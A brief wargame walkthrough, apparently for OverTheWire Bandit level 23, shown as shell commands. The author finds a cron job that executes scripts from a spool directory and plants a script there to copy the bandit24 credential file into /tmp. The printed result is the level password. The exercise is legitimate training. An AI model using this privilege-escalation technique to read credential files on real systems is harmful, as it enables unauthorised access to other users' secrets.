Find out what script is being executed from cron job from /etc/cron.d/ folder 
In this level I need to write script. 

bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
	echo "Handling $i"
	timeout -s 9 60 ./$i
	rm -f ./$i
    fi
done


bandit23@bandit:/etc/cron.d$ mkdir /tmp/dec22
bandit23@bandit:/etc/cron.d$ cat /tmp/dec22/run_it.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/out.txt
bandit23@bandit:/etc/cron.d$ chmod 777 /tmp/dec22/run_it.sh
bandit23@bandit:/etc/cron.d$ cp /tmp/dec22/run_it.sh /var/spool/bandit24/
bandit23@bandit:/etc/cron.d$ cat /tmp/out.txt


UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
